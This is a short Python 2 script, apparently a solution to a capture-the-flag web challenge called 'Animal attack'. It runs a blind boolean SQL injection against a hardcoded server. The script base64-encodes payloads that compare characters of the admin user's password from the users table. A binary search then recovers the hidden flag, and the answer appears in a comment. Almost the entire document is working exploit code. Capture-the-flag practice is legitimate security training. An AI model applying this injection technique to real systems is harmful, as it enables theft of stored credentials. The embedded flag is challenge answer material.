web - 200 - Animal attack - success

1. import base64
2. import math
3. import requests
4.  
5.  
6. def make_request(sqlstr):
7.   return requests.post('http://128.199.224.175:24000', data = {'spy_name':base64.b64encode(sqlstr)})
8.  
9. def check_request(sqlstr):
10.   r = make_request(sqlstr)
11.  
12.   if r.content.find('Are commanded him convinced dashwoods did estimable') == -1:
13.     return False
14.  
15.   return True
16.  
17. def build_injection(index, comparison):
18.   part1 = "%' and ascii(substring((select password from users where username = 'admin'),"
19.   part2 = ",1))"
20.   part3 = " limit 1#"
21.   return part1 + str(index) + part2 + comparison + part3
22.  
23. # This is not bruteforce! It's actually educated guess
24. # Also we are being fair game and being gentle on server
25. def guess(index, low, high):
26.   if high - low == 1:
27.     if check_request(build_injection(index, '=' + str(low))):
28.       return low
29.     elif check_request(build_injection(index, '=' + str(high))):
30.       return high
31.     else:
32.       raise Exception()
33.  
34.   middle = int(math.floor((low + high) / 2))
35.   if check_request(build_injection(index, '<' + str(middle))):
36.     print '#', index, ': ', low, ' - ', middle
37.     return guess(index, low, middle)
38.   else:
39.     print '#', index, ': ', middle, ' - ', high
40.     return guess(index, middle, high)
41.  
42. # key = "pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}"
43. key = 'pctf{'
44.  
45. length = 40 # pctf{L31___________________________}
46.  
47. for i in xrange(len(key) + 1,length):
48.   try:
49.     key += chr(guess(i, 32, 127))
50.   except Exception as e:
51.     print key
52.     raw_input()
53.  
54.   print key
55.  
56. print key